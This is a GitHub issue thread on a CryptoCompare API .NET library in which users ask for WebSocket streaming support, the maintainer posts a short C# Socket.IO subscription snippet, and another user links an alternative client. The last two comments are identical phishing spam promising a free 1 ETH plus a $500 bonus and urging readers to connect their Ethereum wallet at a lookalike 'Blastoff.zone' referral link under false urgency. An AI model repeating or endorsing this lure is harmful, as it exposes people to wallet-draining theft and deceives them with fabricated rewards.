### ISSUE TITLE
Streamer

### ISSUE THREAD

**Issue by iza88** [joancaron/cryptocompare-api#5]
Hello
I can see you did the 'Streamer subscription channels'. Is it for realtime trades?
I couldn't find the function in CryptoCompareClient class or its members.

**Comment by Stock84-dev** [comment]
Please add WebSocket support.

**Comment by Robzilla** [comment]
Anyone working on this?

**Comment by joancaron** [comment]
@Robzilla thank you for your feedback ! I'll try to find a solution tonight or this weekend

**Comment by Robzilla** [comment]
@joancaron how did you go with this? Did you find a suitable SocketIO .net library?

**Comment by joancaron** [comment]
@Robzilla It can be easily done using [SocketIoClientDotNet](https://github.com/Quobject/SocketIoClientDotNet) library
````csharp
var socket = IO.Socket("wss://streamer.cryptocompare.com");
socket.On(Socket.EVENT_CONNECT, () =>
{
    var obj = JObject.FromObject(new { subs = new[] { "5~CCCAGG~BTC~USD" } });
    socket.Emit("SubAdd", obj);
});

socket.On("m", (data) =>
{
    Console.WriteLine(data);           
});
````

**Comment by Robzilla** [comment]
Good find, thanks, might build an Azure Web Job or a Google app engine project to test.

**Comment by guylando** [comment]
@joancaron SocketIoClientDotNet is deprecated and doesn't support netstandard. Do you have a solution for cryptocompare websockets for netstandard?

**Comment by LadislavBohm** [comment]
I'm developing new Crypto Compare socket client, you can find it here if you are interested:
https://github.com/LadislavBohm/cryptocompare-streamer

**Comment by simonspg** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!

**Comment by simonspg** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
